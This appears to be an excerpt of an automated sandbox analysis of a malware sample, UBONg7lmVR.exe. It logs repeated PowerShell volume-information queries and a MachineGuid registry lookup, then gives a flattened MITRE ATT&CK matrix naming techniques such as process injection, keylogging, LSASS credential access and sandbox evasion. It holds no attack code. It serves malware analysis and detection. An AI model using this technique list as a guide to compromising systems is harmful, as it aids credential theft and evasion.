Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\UBONg7lmVR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
Native API
1
DLL Side-Loading
11
Process Injection
1
Masquerading
11
Input Capture
1
Query Registry
Remote Services11
Input Capture
21
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
11
Disable or Modify Tools
LSASS Memory21
Security Software Discovery
Remote Desktop Protocol1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)141
Virtualization/Sandbox Evasion
Security Account Manager2
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection
NTDS141
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Software Packing
Cached Domain Credentials2
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Timestomp
DCSync24
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

